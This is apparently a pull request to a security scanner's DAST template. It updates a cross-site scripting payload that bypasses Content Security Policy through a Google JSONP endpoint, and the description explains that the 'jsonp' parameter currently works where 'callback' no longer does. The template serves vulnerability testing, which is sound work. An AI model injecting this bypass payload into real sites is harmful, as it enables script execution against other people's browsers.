### PR TITLE
Fix: Update www.google.com CSP bypass vector

### DIFF
--- a/dast/vulnerabilities/xss/csp-bypass/google-complete-csp-bypass.yaml
+++ b/dast/vulnerabilities/xss/csp-bypass/google-complete-csp-bypass.yaml
@@ -39,7 +39,7 @@ headless:
 
     payloads:
       injection:
-        - '<script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>'
+        - '<script src="https://www.google.com/complete/search?client=chrome&jsonp=alert(1)"></script>'
 
     fuzzing:
       - part: query


### PR DESCRIPTION
## Body:
This PR updates the JSONP endpoint parameter for the www.google.com CSP bypass vector.

The previously used callback parameter is no longer effective. It has been replaced with the currently working jsonp parameter to ensure the payload's validity.

## Changes:

Before: https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1

After: https://www.google.com/complete/search?client=chrome&jsonp=alert(1)
<img width="2149" height="774" alt="image" src="https://github.com/user-attachments/assets/12829893-ed01-4e08-993b-70c34e1cb912" />

## Change commit
https://github.com/renniepak/CSPBypass/commit/ecf65ff77bb6343f8f106b74282a2dbca67dea95